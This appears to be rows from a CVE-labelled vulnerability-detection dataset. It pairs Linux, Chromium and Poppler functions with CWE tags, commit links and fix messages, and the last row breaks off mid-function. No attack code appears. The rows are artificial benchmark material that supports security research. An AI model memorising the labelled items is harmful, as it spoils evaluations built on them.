svcrdma: Clean out old XDR encoders
svcrdma: Remove the req_map cache
svcrdma: Remove unused RDMA Write completion handler
svcrdma: Reduce size of sge array in struct svc_rdma_op_ctxt
svcrdma: Clean up RPC-over-RDMA backchannel reply processing
svcrdma: Report Write/Reply chunk overruns
svcrdma: Clean up RDMA_ERROR path
svcrdma: Use rdma_rw API in RPC reply path
svcrdma: Introduce local rdma_rw API helpers
svcrdma: Clean up svc_rdma_get_inv_rkey()
svcrdma: Add helper to save pages under I/O
svcrdma: Eliminate RPCRDMA_SQ_DEPTH_MULT
...
|
nfsd4_close(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
struct nfsd4_close *close)
{
__be32 status;
struct nfs4_ol_stateid *stp;
struct net *net = SVC_NET(rqstp);
struct nfsd_net *nn = net_generic(net, nfsd_net_id);
dprintk("NFSD: nfsd4_close on file %pd\n",
cstate->current_fh.fh_dentry);
status = nfs4_preprocess_seqid_op(cstate, close->cl_seqid,
&close->cl_stateid,
NFS4_OPEN_STID|NFS4_CLOSED_STID,
&stp, nn);
nfsd4_bump_seqid(cstate, status);
if (status)
goto out;
nfs4_inc_and_copy_stateid(&close->cl_stateid, &stp->st_stid);
mutex_unlock(&stp->st_mutex);
nfsd4_close_open_stateid(stp);
/* put reference from nfs4_preprocess_seqid_op */
nfs4_put_stid(&stp->st_stid);
out:
return status;
}
|
nfsd4_close(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
struct nfsd4_close *close)
{
__be32 status;
struct nfs4_ol_stateid *stp;
struct net *net = SVC_NET(rqstp);
struct nfsd_net *nn = net_generic(net, nfsd_net_id);
dprintk("NFSD: nfsd4_close on file %pd\n",
cstate->current_fh.fh_dentry);
status = nfs4_preprocess_seqid_op(cstate, close->cl_seqid,
&close->cl_stateid,
NFS4_OPEN_STID|NFS4_CLOSED_STID,
&stp, nn);
nfsd4_bump_seqid(cstate, status);
if (status)
goto out;
nfs4_inc_and_copy_stateid(&close->cl_stateid, &stp->st_stid);
mutex_unlock(&stp->st_mutex);
nfsd4_close_open_stateid(stp);
/* put reference from nfs4_preprocess_seqid_op */
nfs4_put_stid(&stp->st_stid);
out:
return status;
}
|
C
|
linux
| 0 |
CVE-2012-6544
|
https://www.cvedetails.com/cve/CVE-2012-6544/
|
CWE-200
|
https://github.com/torvalds/linux/commit/e15ca9a0ef9a86f0477530b0f44a725d67f889ee
|
e15ca9a0ef9a86f0477530b0f44a725d67f889ee
|
Bluetooth: HCI - Fix info leak in getsockopt(HCI_FILTER)
The HCI code fails to initialize the two padding bytes of struct
hci_ufilter before copying it to userland -- that for leaking two
bytes kernel stack. Add an explicit memset(0) before filling the
structure to avoid the info leak.
Signed-off-by: Mathias Krause <minipli@googlemail.com>
Cc: Marcel Holtmann <marcel@holtmann.org>
Cc: Gustavo Padovan <gustavo@padovan.org>
Cc: Johan Hedberg <johan.hedberg@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
|
static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
unsigned long arg)
{
struct sock *sk = sock->sk;
void __user *argp = (void __user *) arg;
int err;
BT_DBG("cmd %x arg %lx", cmd, arg);
switch (cmd) {
case HCIGETDEVLIST:
return hci_get_dev_list(argp);
case HCIGETDEVINFO:
return hci_get_dev_info(argp);
case HCIGETCONNLIST:
return hci_get_conn_list(argp);
case HCIDEVUP:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_open(arg);
case HCIDEVDOWN:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_close(arg);
case HCIDEVRESET:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_reset(arg);
case HCIDEVRESTAT:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_reset_stat(arg);
case HCISETSCAN:
case HCISETAUTH:
case HCISETENCRYPT:
case HCISETPTYPE:
case HCISETLINKPOL:
case HCISETLINKMODE:
case HCISETACLMTU:
case HCISETSCOMTU:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_cmd(cmd, argp);
case HCIINQUIRY:
return hci_inquiry(argp);
default:
lock_sock(sk);
err = hci_sock_bound_ioctl(sk, cmd, arg);
release_sock(sk);
return err;
}
}
|
static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
unsigned long arg)
{
struct sock *sk = sock->sk;
void __user *argp = (void __user *) arg;
int err;
BT_DBG("cmd %x arg %lx", cmd, arg);
switch (cmd) {
case HCIGETDEVLIST:
return hci_get_dev_list(argp);
case HCIGETDEVINFO:
return hci_get_dev_info(argp);
case HCIGETCONNLIST:
return hci_get_conn_list(argp);
case HCIDEVUP:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_open(arg);
case HCIDEVDOWN:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_close(arg);
case HCIDEVRESET:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_reset(arg);
case HCIDEVRESTAT:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_reset_stat(arg);
case HCISETSCAN:
case HCISETAUTH:
case HCISETENCRYPT:
case HCISETPTYPE:
case HCISETLINKPOL:
case HCISETLINKMODE:
case HCISETACLMTU:
case HCISETSCOMTU:
if (!capable(CAP_NET_ADMIN))
return -EACCES;
return hci_dev_cmd(cmd, argp);
case HCIINQUIRY:
return hci_inquiry(argp);
default:
lock_sock(sk);
err = hci_sock_bound_ioctl(sk, cmd, arg);
release_sock(sk);
return err;
}
}
|
C
|
linux
| 0 |
CVE-2016-7097
|
https://www.cvedetails.com/cve/CVE-2016-7097/
|
CWE-285
|
https://github.com/torvalds/linux/commit/073931017b49d9458aa351605b43a7e34598caef
|
073931017b49d9458aa351605b43a7e34598caef
|
posix_acl: Clear SGID bit when setting file permissions
When file permissions are modified via chmod(2) and the user is not in
the owning group or capable of CAP_FSETID, the setgid bit is cleared in
inode_change_ok(). Setting a POSIX ACL via setxattr(2) sets the file
permissions as well as the new ACL, but doesn't clear the setgid bit in
a similar way; this allows to bypass the check in chmod(2). Fix that.
References: CVE-2016-7097
Reviewed-by: Christoph Hellwig <hch@lst.de>
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
|
xfs_acl_from_disk(
const struct xfs_acl *aclp,
int len,
int max_entries)
{
struct posix_acl_entry *acl_e;
struct posix_acl *acl;
const struct xfs_acl_entry *ace;
unsigned int count, i;
if (len < sizeof(*aclp))
return ERR_PTR(-EFSCORRUPTED);
count = be32_to_cpu(aclp->acl_cnt);
if (count > max_entries || XFS_ACL_SIZE(count) != len)
return ERR_PTR(-EFSCORRUPTED);
acl = posix_acl_alloc(count, GFP_KERNEL);
if (!acl)
return ERR_PTR(-ENOMEM);
for (i = 0; i < count; i++) {
acl_e = &acl->a_entries[i];
ace = &aclp->acl_entry[i];
/*
* The tag is 32 bits on disk and 16 bits in core.
*
* Because every access to it goes through the core
* format first this is not a problem.
*/
acl_e->e_tag = be32_to_cpu(ace->ae_tag);
acl_e->e_perm = be16_to_cpu(ace->ae_perm);
switch (acl_e->e_tag) {
case ACL_USER:
acl_e->e_uid = xfs_uid_to_kuid(be32_to_cpu(ace->ae_id));
break;
case ACL_GROUP:
acl_e->e_gid = xfs_gid_to_kgid(be32_to_cpu(ace->ae_id));
break;
case ACL_USER_OBJ:
case ACL_GROUP_OBJ:
case ACL_MASK:
case ACL_OTHER:
break;
default:
goto fail;
}
}
return acl;
fail:
posix_acl_release(acl);
return ERR_PTR(-EINVAL);
}
|
xfs_acl_from_disk(
const struct xfs_acl *aclp,
int len,
int max_entries)
{
struct posix_acl_entry *acl_e;
struct posix_acl *acl;
const struct xfs_acl_entry *ace;
unsigned int count, i;
if (len < sizeof(*aclp))
return ERR_PTR(-EFSCORRUPTED);
count = be32_to_cpu(aclp->acl_cnt);
if (count > max_entries || XFS_ACL_SIZE(count) != len)
return ERR_PTR(-EFSCORRUPTED);
acl = posix_acl_alloc(count, GFP_KERNEL);
if (!acl)
return ERR_PTR(-ENOMEM);
for (i = 0; i < count; i++) {
acl_e = &acl->a_entries[i];
ace = &aclp->acl_entry[i];
/*
* The tag is 32 bits on disk and 16 bits in core.
*
* Because every access to it goes through the core
* format first this is not a problem.
*/
acl_e->e_tag = be32_to_cpu(ace->ae_tag);
acl_e->e_perm = be16_to_cpu(ace->ae_perm);
switch (acl_e->e_tag) {
case ACL_USER:
acl_e->e_uid = xfs_uid_to_kuid(be32_to_cpu(ace->ae_id));
break;
case ACL_GROUP:
acl_e->e_gid = xfs_gid_to_kgid(be32_to_cpu(ace->ae_id));
break;
case ACL_USER_OBJ:
case ACL_GROUP_OBJ:
case ACL_MASK:
case ACL_OTHER:
break;
default:
goto fail;
}
}
return acl;
fail:
posix_acl_release(acl);
return ERR_PTR(-EINVAL);
}
|
C
|
linux
| 0 |
CVE-2019-9003
|
https://www.cvedetails.com/cve/CVE-2019-9003/
|
CWE-416
|
https://github.com/torvalds/linux/commit/77f8269606bf95fcb232ee86f6da80886f1dfae8
|
77f8269606bf95fcb232ee86f6da80886f1dfae8
|
ipmi: fix use-after-free of user->release_barrier.rda
When we do the following test, we got oops in ipmi_msghandler driver
while((1))
do
service ipmievd restart & service ipmievd restart
done
---------------------------------------------------------------
[ 294.230186] Unable to handle kernel paging request at virtual address 0000803fea6ea008
[ 294.230188] Mem abort info:
[ 294.230190] ESR = 0x96000004
[ 294.230191] Exception class = DABT (current EL), IL = 32 bits
[ 294.230193] SET = 0, FnV = 0
[ 294.230194] EA = 0, S1PTW = 0
[ 294.230195] Data abort info:
[ 294.230196] ISV = 0, ISS = 0x00000004
[ 294.230197] CM = 0, WnR = 0
[ 294.230199] user pgtable: 4k pages, 48-bit VAs, pgdp = 00000000a1c1b75a
[ 294.230201] [0000803fea6ea008] pgd=0000000000000000
[ 294.230204] Internal error: Oops: 96000004 [#1] SMP
[ 294.235211] Modules linked in: nls_utf8 isofs rpcrdma ib_iser ib_srpt target_core_mod ib_srp scsi_transport_srp ib_ipoib rdma_ucm ib_umad rdma_cm ib_cm iw_cm dm_mirror dm_region_hash dm_log dm_mod aes_ce_blk crypto_simd cryptd aes_ce_cipher ghash_ce sha2_ce ses sha256_arm64 sha1_ce hibmc_drm hisi_sas_v2_hw enclosure sg hisi_sas_main sbsa_gwdt ip_tables mlx5_ib ib_uverbs marvell ib_core mlx5_core ixgbe ipmi_si mdio hns_dsaf ipmi_devintf ipmi_msghandler hns_enet_drv hns_mdio
[ 294.277745] CPU: 3 PID: 0 Comm: swapper/3 Kdump: loaded Not tainted 5.0.0-rc2+ #113
[ 294.285511] Hardware name: Huawei TaiShan 2280 /BC11SPCD, BIOS 1.37 11/21/2017
[ 294.292835] pstate: 80000005 (Nzcv daif -PAN -UAO)
[ 294.297695] pc : __srcu_read_lock+0x38/0x58
[ 294.301940] lr : acquire_ipmi_user+0x2c/0x70 [ipmi_msghandler]
[ 294.307853] sp : ffff00001001bc80
[ 294.311208] x29: ffff00001001bc80 x28: ffff0000117e5000
[ 294.316594] x27: 0000000000000000 x26: dead000000000100
[ 294.321980] x25: dead000000000200 x24: ffff803f6bd06800
[ 294.327366] x23: 0000000000000000 x22: 0000000000000000
[ 294.332752] x21: ffff00001001bd04 x20: ffff80df33d19018
[ 294.338137] x19: ffff80df33d19018 x18: 0000000000000000
[ 294.343523] x17: 0000000000000000 x16: 0000000000000000
[ 294.348908] x15: 0000000000000000 x14: 0000000000000002
[ 294.354293] x13: 0000000000000000 x12: 0000000000000000
[ 294.359679] x11: 0000000000000000 x10: 0000000000100000
[ 294.365065] x9 : 0000000000000000 x8 : 0000000000000004
[ 294.370451] x7 : 0000000000000000 x6 : ffff80df34558678
[ 294.375836] x5 : 000000000000000c x4 : 0000000000000000
[ 294.381221] x3 : 0000000000000001 x2 : 0000803fea6ea000
[ 294.386607] x1 : 0000803fea6ea008 x0 : 0000000000000001
[ 294.391994] Process swapper/3 (pid: 0, stack limit = 0x0000000083087293)
[ 294.398791] Call trace:
[ 294.401266] __srcu_read_lock+0x38/0x58
[ 294.405154] acquire_ipmi_user+0x2c/0x70 [ipmi_msghandler]
[ 294.410716] deliver_response+0x80/0xf8 [ipmi_msghandler]
[ 294.416189] deliver_local_response+0x28/0x68 [ipmi_msghandler]
[ 294.422193] handle_one_recv_msg+0x158/0xcf8 [ipmi_msghandler]
[ 294.432050] handle_new_recv_msgs+0xc0/0x210 [ipmi_msghandler]
[ 294.441984] smi_recv_tasklet+0x8c/0x158 [ipmi_msghandler]
[ 294.451618] tasklet_action_common.isra.5+0x88/0x138
[ 294.460661] tasklet_action+0x2c/0x38
[ 294.468191] __do_softirq+0x120/0x2f8
[ 294.475561] irq_exit+0x134/0x140
[ 294.482445] __handle_domain_irq+0x6c/0xc0
[ 294.489954] gic_handle_irq+0xb8/0x178
[ 294.497037] el1_irq+0xb0/0x140
[ 294.503381] arch_cpu_idle+0x34/0x1a8
[ 294.510096] do_idle+0x1d4/0x290
[ 294.516322] cpu_startup_entry+0x28/0x30
[ 294.523230] secondary_start_kernel+0x184/0x1d0
[ 294.530657] Code: d538d082 d2800023 8b010c81 8b020021 (c85f7c25)
[ 294.539746] ---[ end trace 8a7a880dee570b29 ]---
[ 294.547341] Kernel panic - not syncing: Fatal exception in interrupt
[ 294.556837] SMP: stopping secondary CPUs
[ 294.563996] Kernel Offset: disabled
[ 294.570515] CPU features: 0x002,21006008
[ 294.577638] Memory Limit: none
[ 294.587178] Starting crashdump kernel...
[ 294.594314] Bye!
Because the user->release_barrier.rda is freed in ipmi_destroy_user(), but
the refcount is not zero, when acquire_ipmi_user() uses user->release_barrier.rda
in __srcu_read_lock(), it causes oops.
Fix this by calling cleanup_srcu_struct() when the refcount is zero.
Fixes: e86ee2d44b44 ("ipmi: Rework locking and shutdown for hot remove")
Cc: stable@vger.kernel.org # 4.18
Signed-off-by: Yang Yingliang <yangyingliang@huawei.com>
Signed-off-by: Corey Minyard <cminyard@mvista.com>
|
static ssize_t device_id_show(struct device *dev,
struct device_attribute *attr,
char *buf)
{
struct bmc_device *bmc = to_bmc_device(dev);
struct ipmi_device_id id;
int rv;
rv = bmc_get_device_id(NULL, bmc, &id, NULL, NULL);
if (rv)
return rv;
return snprintf(buf, 10, "%u\n", id.device_id);
}
|
static ssize_t device_id_show(struct device *dev,
struct device_attribute *attr,
char *buf)
{
struct bmc_device *bmc = to_bmc_device(dev);
struct ipmi_device_id id;
int rv;
rv = bmc_get_device_id(NULL, bmc, &id, NULL, NULL);
if (rv)
return rv;
return snprintf(buf, 10, "%u\n", id.device_id);
}
|
C
|
linux
| 0 |
CVE-2016-5218
|
https://www.cvedetails.com/cve/CVE-2016-5218/
|
CWE-20
|
https://github.com/chromium/chromium/commit/45d901b56f578a74b19ba0d10fa5c4c467f19303
|
45d901b56f578a74b19ba0d10fa5c4c467f19303
|
Paint tab groups with the group color.
* The background of TabGroupHeader now uses the group color.
* The backgrounds of tabs in the group are tinted with the group color.
This treatment, along with the colors chosen, are intended to be
a placeholder.
Bug: 905491
Change-Id: Ic808548f8eba23064606e7fb8c9bba281d0d117f
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1610504
Commit-Queue: Bret Sepulveda <bsep@chromium.org>
Reviewed-by: Taylor Bergquist <tbergquist@chromium.org>
Cr-Commit-Position: refs/heads/master@{#660498}
|
bool TabStrip::ShouldPaintAsActiveFrame() const {
return controller_->ShouldPaintAsActiveFrame();
}
|
bool TabStrip::ShouldPaintAsActiveFrame() const {
return controller_->ShouldPaintAsActiveFrame();
}
|
C
|
Chrome
| 0 |
CVE-2016-10741
|
https://www.cvedetails.com/cve/CVE-2016-10741/
|
CWE-362
|
https://github.com/torvalds/linux/commit/04197b341f23b908193308b8d63d17ff23232598
|
04197b341f23b908193308b8d63d17ff23232598
|
xfs: don't BUG() on mixed direct and mapped I/O
We've had reports of generic/095 causing XFS to BUG() in
__xfs_get_blocks() due to the existence of delalloc blocks on a
direct I/O read. generic/095 issues a mix of various types of I/O,
including direct and memory mapped I/O to a single file. This is
clearly not supported behavior and is known to lead to such
problems. E.g., the lack of exclusion between the direct I/O and
write fault paths means that a write fault can allocate delalloc
blocks in a region of a file that was previously a hole after the
direct read has attempted to flush/inval the file range, but before
it actually reads the block mapping. In turn, the direct read
discovers a delalloc extent and cannot proceed.
While the appropriate solution here is to not mix direct and memory
mapped I/O to the same regions of the same file, the current
BUG_ON() behavior is probably overkill as it can crash the entire
system. Instead, localize the failure to the I/O in question by
returning an error for a direct I/O that cannot be handled safely
due to delalloc blocks. Be careful to allow the case of a direct
write to post-eof delalloc blocks. This can occur due to speculative
preallocation and is safe as post-eof blocks are not accompanied by
dirty pages in pagecache (conversely, preallocation within eof must
have been zeroed, and thus dirtied, before the inode size could have
been increased beyond said blocks).
Finally, provide an additional warning if a direct I/O write occurs
while the file is memory mapped. This may not catch all problematic
scenarios, but provides a hint that some known-to-be-problematic I/O
methods are in use.
Signed-off-by: Brian Foster <bfoster@redhat.com>
Reviewed-by: Dave Chinner <dchinner@redhat.com>
Signed-off-by: Dave Chinner <david@fromorbit.com>
|
xfs_get_blocks_direct(
struct inode *inode,
sector_t iblock,
struct buffer_head *bh_result,
int create)
{
return __xfs_get_blocks(inode, iblock, bh_result, create, true, false);
}
|
xfs_get_blocks_direct(
struct inode *inode,
sector_t iblock,
struct buffer_head *bh_result,
int create)
{
return __xfs_get_blocks(inode, iblock, bh_result, create, true, false);
}
|
C
|
linux
| 0 |
CVE-2009-3605
|
https://www.cvedetails.com/cve/CVE-2009-3605/
|
CWE-189
|
https://cgit.freedesktop.org/poppler/poppler/commit/?id=7b2d314a61fd0e12f47c62996cb49ec0d1ba747a
|
7b2d314a61fd0e12f47c62996cb49ec0d1ba747a
| null |
void CairoOutputDev::updateFont(GfxState *state) {
cairo_font_face_t *font_face;
cairo_matrix_t matrix, invert_matrix;
LOG(printf ("updateFont() font=%s\n", state->getFont()->getName()->getCString()));
needFontUpdate = gFalse;
if (text)
text->updateFont(state);
currentFont = fontEngine->getFont (state->getFont(), xref, catalog, printing);
if (!currentFont)
return;
LOG(printf ("font matrix: %f %f %f %f\n", m11, m12, m21, m22));
font_face = currentFont->getFontFace();
cairo_set_font_face (cairo, font_face);
double fontSize = state->getFontSize();
double *m = state->getTextMat();
/* NOTE: adjusting by a constant is hack. The correct solution
* is probably to use user-fonts and compute the scale on a per
* glyph basis instead of for the entire font */
double w = currentFont->getSubstitutionCorrection(state->getFont());
matrix.xx = m[0] * fontSize * state->getHorizScaling() * w;
matrix.yx = m[1] * fontSize * state->getHorizScaling() * w;
matrix.xy = -m[2] * fontSize;
matrix.yy = -m[3] * fontSize;
matrix.x0 = 0;
matrix.y0 = 0;
/* Make sure the font matrix is invertible before setting it. cairo
* will blow up if we give it a matrix that's not invertible, so we
* need to check before passing it to cairo_set_font_matrix. Ignoring it
* is likely to give better results than not rendering anything at
* all. See #18254.
*/
invert_matrix = matrix;
if (cairo_matrix_invert(&invert_matrix)) {
warning("font matrix not invertible\n");
return;
}
cairo_set_font_matrix (cairo, &matrix);
}
|
void CairoOutputDev::updateFont(GfxState *state) {
cairo_font_face_t *font_face;
cairo_matrix_t matrix, invert_matrix;
LOG(printf ("updateFont() font=%s\n", state->getFont()->getName()->getCString()));
needFontUpdate = gFalse;
if (text)
text->updateFont(state);
currentFont = fontEngine->getFont (state->getFont(), xref, catalog, printing);
if (!currentFont)
return;
LOG(printf ("font matrix: %f %f %f %f\n", m11, m12, m21, m22));
font_face = currentFont->getFontFace();
cairo_set_font_face (cairo, font_face);
double fontSize = state->getFontSize();
double *m = state->getTextMat();
/* NOTE: adjusting by a constant is hack. The correct solution
* is probably to use user-fonts and compute the scale on a per
* glyph basis instead of for the entire font */
double w = currentFont->getSubstitutionCorrection(state->getFont());
matrix.xx = m[0] * fontSize * state->getHorizScaling() * w;
matrix.yx = m[1] * fontSize * state->getHorizScaling() * w;
matrix.xy = -m[2] * fontSize;
matrix.yy = -m[3] * fontSize;
matrix.x0 = 0;
matrix.y0 = 0;
/* Make sure the font matrix is invertible before setting it. cairo
* will blow up if we give it a matrix that's not invertible, so we
* need to check before passing it to cairo_set_font_matrix. Ignoring it
* is likely to give better results than not rendering anything at
* all. See #18254.
*/
invert_matrix = matrix;
if (cairo_matrix_invert(&invert_matrix)) {
warning("font matrix not invertible\n");
return;
}
cairo_set_font_matrix (cairo, &matrix);
}
|
CPP
|
poppler
| 0 |
CVE-2019-5837
|
https://www.cvedetails.com/cve/CVE-2019-5837/
|
CWE-200
|
https://github.com/chromium/chromium/commit/04aaacb936a08d70862d6d9d7e8354721ae46be8
|
04aaacb936a08d70862d6d9d7e8354721ae46be8
|
Reland "AppCache: Add padding to cross-origin responses."
This is a reland of 85b389caa7d725cdd31f59e9a2b79ff54804b7b7
Initialized CacheRecord::padding_size to 0.
Original change's description:
> AppCache: Add padding to cross-origin responses.
>
> Bug: 918293
> Change-Id: I4f16640f06feac009d6bbbb624951da6d2669f6c
> Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1488059
> Commit-Queue: Staphany Park <staphany@chromium.org>
> Reviewed-by: Victor Costan <pwnall@chromium.org>
> Reviewed-by: Marijn Kruisselbrink <mek@chromium.org>
> Cr-Commit-Position: refs/heads/master@{#644624}
Bug: 918293
Change-Id: Ie1d3f99c7e8a854d33255a4d66243da2ce16441c
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1539906
Reviewed-by: Victor Costan <pwnall@chromium.org>
Commit-Queue: Staphany Park <staphany@chromium.org>
Cr-Commit-Position: refs/heads/master@{#644719}
|
void MakeMultipleHitCacheAndGroup(const GURL& manifest_url, int id) {
MakeCacheAndGroup(manifest_url, id, id, true);
AppCacheDatabase::EntryRecord entry_record;
entry_record.cache_id = id;
entry_record.url = kEntryUrl;
entry_record.flags = AppCacheEntry::EXPLICIT;
entry_record.response_id = id;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
entry_record.cache_id = id;
entry_record.url = manifest_url;
entry_record.flags = AppCacheEntry::MANIFEST;
entry_record.response_id = id + kManifestEntryIdOffset;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
entry_record.cache_id = id;
entry_record.url = kEntryUrl2;
entry_record.flags = AppCacheEntry::FALLBACK;
entry_record.response_id = id + kFallbackEntryIdOffset;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
AppCacheDatabase::NamespaceRecord fallback_namespace_record;
fallback_namespace_record.cache_id = id;
fallback_namespace_record.namespace_.target_url = entry_record.url;
fallback_namespace_record.namespace_.namespace_url = kFallbackNamespace;
fallback_namespace_record.origin = url::Origin::Create(manifest_url);
EXPECT_TRUE(database()->InsertNamespace(&fallback_namespace_record));
cache_->fallback_namespaces_.push_back(AppCacheNamespace(
APPCACHE_FALLBACK_NAMESPACE, kFallbackNamespace, kEntryUrl2, false));
}
|
void MakeMultipleHitCacheAndGroup(const GURL& manifest_url, int id) {
MakeCacheAndGroup(manifest_url, id, id, true);
AppCacheDatabase::EntryRecord entry_record;
entry_record.cache_id = id;
entry_record.url = kEntryUrl;
entry_record.flags = AppCacheEntry::EXPLICIT;
entry_record.response_id = id;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
entry_record.cache_id = id;
entry_record.url = manifest_url;
entry_record.flags = AppCacheEntry::MANIFEST;
entry_record.response_id = id + kManifestEntryIdOffset;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
entry_record.cache_id = id;
entry_record.url = kEntryUrl2;
entry_record.flags = AppCacheEntry::FALLBACK;
entry_record.response_id = id + kFallbackEntryIdOffset;
EXPECT_TRUE(database()->InsertEntry(&entry_record));
cache_->AddEntry(entry_record.url, AppCacheEntry(entry_record.flags,
entry_record.response_id));
AppCacheDatabase::NamespaceRecord fallback_namespace_record;
fallback_namespace_record.cache_id = id;
fallback_namespace_record.namespace_.target_url = entry_record.url;
fallback_namespace_record.namespace_.namespace_url = kFallbackNamespace;
fallback_namespace_record.origin = url::Origin::Create(manifest_url);
EXPECT_TRUE(database()->InsertNamespace(&fallback_namespace_record));
cache_->fallback_namespaces_.push_back(AppCacheNamespace(
APPCACHE_FALLBACK_NAMESPACE, kFallbackNamespace, kEntryUrl2, false));
}
|
C
|
Chrome
| 0 |
CVE-2011-2785
|
https://www.cvedetails.com/cve/CVE-2011-2785/
|
CWE-20
|
https://github.com/chromium/chromium/commit/697cd7e2ce2535696f1b9e5cfb474cc36a734747
|
697cd7e2ce2535696f1b9e5cfb474cc36a734747
|
Prevent extensions from defining homepages with schemes other than valid web extents.
BUG=84402
TEST=ExtensionManifestTest.ParseHomepageURLs
Review URL: http://codereview.chromium.org/7089014
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@87722 0039d316-1c4b-4281-b951-d872f2087c98
|
bool Extension::InitFromValue(const DictionaryValue& source, int flags,
std::string* error) {
URLPattern::ParseOption parse_strictness =
(flags & STRICT_ERROR_CHECKS ? URLPattern::PARSE_STRICT
: URLPattern::PARSE_LENIENT);
if (source.HasKey(keys::kPublicKey)) {
std::string public_key_bytes;
if (!source.GetString(keys::kPublicKey,
&public_key_) ||
!ParsePEMKeyBytes(public_key_,
&public_key_bytes) ||
!GenerateId(public_key_bytes, &id_)) {
*error = errors::kInvalidKey;
return false;
}
} else if (flags & REQUIRE_KEY) {
*error = errors::kInvalidKey;
return false;
} else {
id_ = Extension::GenerateIdForPath(path());
if (id_.empty()) {
NOTREACHED() << "Could not create ID from path.";
return false;
}
}
manifest_value_.reset(source.DeepCopy());
extension_url_ = Extension::GetBaseURLFromExtensionId(id());
std::string version_str;
if (!source.GetString(keys::kVersion, &version_str)) {
*error = errors::kInvalidVersion;
return false;
}
version_.reset(Version::GetVersionFromString(version_str));
if (!version_.get() ||
version_->components().size() > 4) {
*error = errors::kInvalidVersion;
return false;
}
string16 localized_name;
if (!source.GetString(keys::kName, &localized_name)) {
*error = errors::kInvalidName;
return false;
}
base::i18n::AdjustStringForLocaleDirection(&localized_name);
name_ = UTF16ToUTF8(localized_name);
if (source.HasKey(keys::kDescription)) {
if (!source.GetString(keys::kDescription,
&description_)) {
*error = errors::kInvalidDescription;
return false;
}
}
if (source.HasKey(keys::kHomepageURL)) {
std::string tmp;
if (!source.GetString(keys::kHomepageURL, &tmp)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidHomepageURL, "");
return false;
}
homepage_url_ = GURL(tmp);
if (!homepage_url_.is_valid() ||
(!homepage_url_.SchemeIs("http") &&
!homepage_url_.SchemeIs("https"))) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidHomepageURL, tmp);
return false;
}
}
if (source.HasKey(keys::kUpdateURL)) {
std::string tmp;
if (!source.GetString(keys::kUpdateURL, &tmp)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidUpdateURL, "");
return false;
}
update_url_ = GURL(tmp);
if (!update_url_.is_valid() ||
update_url_.has_ref()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidUpdateURL, tmp);
return false;
}
}
if (source.HasKey(keys::kMinimumChromeVersion)) {
std::string minimum_version_string;
if (!source.GetString(keys::kMinimumChromeVersion,
&minimum_version_string)) {
*error = errors::kInvalidMinimumChromeVersion;
return false;
}
scoped_ptr<Version> minimum_version(
Version::GetVersionFromString(minimum_version_string));
if (!minimum_version.get()) {
*error = errors::kInvalidMinimumChromeVersion;
return false;
}
chrome::VersionInfo current_version_info;
if (!current_version_info.is_valid()) {
NOTREACHED();
return false;
}
scoped_ptr<Version> current_version(
Version::GetVersionFromString(current_version_info.Version()));
if (!current_version.get()) {
DCHECK(false);
return false;
}
if (current_version->CompareTo(*minimum_version) < 0) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kChromeVersionTooLow,
l10n_util::GetStringUTF8(IDS_PRODUCT_NAME),
minimum_version_string);
return false;
}
}
source.GetBoolean(keys::kConvertedFromUserScript,
&converted_from_user_script_);
if (source.HasKey(keys::kIcons)) {
DictionaryValue* icons_value = NULL;
if (!source.GetDictionary(keys::kIcons, &icons_value)) {
*error = errors::kInvalidIcons;
return false;
}
for (size_t i = 0; i < arraysize(kIconSizes); ++i) {
std::string key = base::IntToString(kIconSizes[i]);
if (icons_value->HasKey(key)) {
std::string icon_path;
if (!icons_value->GetString(key, &icon_path)) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidIconPath, key);
return false;
}
if (!icon_path.empty() && icon_path[0] == '/')
icon_path = icon_path.substr(1);
if (icon_path.empty()) {
*error = ExtensionErrorUtils::FormatErrorMessage(
errors::kInvalidIconPath, key);
return false;
}
icons_.Add(kIconSizes[i], icon_path);
}
}
}
is_theme_ = false;
if (source.HasKey(keys::kTheme)) {
if (ContainsNonThemeKeys(source)) {
*error = errors::kThemesCannotContainExtensions;
return false;
}
DictionaryValue* theme_value = NULL;
if (!source.GetDictionary(keys::kTheme, &theme_value)) {
*error = errors::kInvalidTheme;
return false;
}
is_theme_ = true;
DictionaryValue* images_value = NULL;
if (theme_value->GetDictionary(keys::kThemeImages, &images_value)) {
for (DictionaryValue::key_iterator iter = images_value->begin_keys();
